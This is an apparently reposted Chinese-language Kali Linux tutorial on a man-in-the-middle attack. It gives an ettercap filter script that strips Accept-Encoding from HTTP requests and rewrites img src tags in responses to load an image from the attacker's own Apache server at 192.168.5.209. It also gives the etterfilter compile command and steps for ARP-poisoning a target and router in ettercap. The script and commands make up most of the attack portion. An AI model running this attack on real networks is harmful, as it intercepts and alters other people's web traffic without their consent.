中间人攻击替换图片

一:先准备一张图片

中间人攻击替换图片_第1张图片

恩恩!低调点好!
我们将图片放大kali的var/www/html目录下

二:启动Apache

 
  • servce apache2 start

中间人攻击替换图片_第2张图片

三:编写攻击脚本

 
  • if (ip.proto == TCP && tcp.dst == 80) {
  • if (search(DATA.data, "Accept-Encoding")) {
  • replace("Accept-Encoding", "Accept-Rubbish!");
  • # note: replacement string is same length as original string
  • #msg("zapped Accept-Encoding!\n");
  • }
  • }
  • if (ip.proto == TCP && tcp.src == 80) {
  • replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
  • replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
  • msg("过滤执行.\n");
  • }

然后另存为alert.filter文件

四:将alert.filter转变为二进制文件

 
  • etterfilter alert.filter -o alert.ef

中间人攻击替换图片_第3张图片

五:利用ettercap进行中间人攻击

将目标添加为1 路由器自身添加为2
中间人攻击替换图片_第4张图片
然后我们载入刚才生成的脚本
中间人攻击替换图片_第5张图片
然后开始中间人攻击
中间人攻击替换图片_第6张图片

你可能感兴趣的:(Kali,Linux,软件-工具使用,渗透,其他文章,无线网络渗透,内网渗透,路由器,Linux工具)